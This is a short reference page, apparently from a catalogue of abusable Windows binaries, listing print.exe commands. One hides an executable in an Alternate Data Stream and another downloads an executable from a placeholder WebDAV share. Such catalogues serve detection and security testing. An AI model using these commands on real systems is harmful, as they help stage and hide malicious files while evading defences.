Skip to content

Latest commit

 

History

History
24 lines (17 loc) · 750 Bytes

print.exe.md

File metadata and controls

24 lines (17 loc) · 750 Bytes

Print.exe

  • Functions: Download, Copy, Add ADS

print /D:C:\ADS\File.txt:file.exe C:\ADS\File.exe
Copy file.exe into the Alternate Data Stream (ADS) of file.txt.

print /D:C:\ADS\CopyOfFile.exe C:\ADS\FileToCopy.exe
Copy FileToCopy.exe to the target C:\ADS\CopyOfFile.exe

print /D:C:\OutFolder\outfile.exe \\WebDavServer\Folder\File.exe
Copy File.exe from a network share to the target c:\OutFolder\outfile.exe.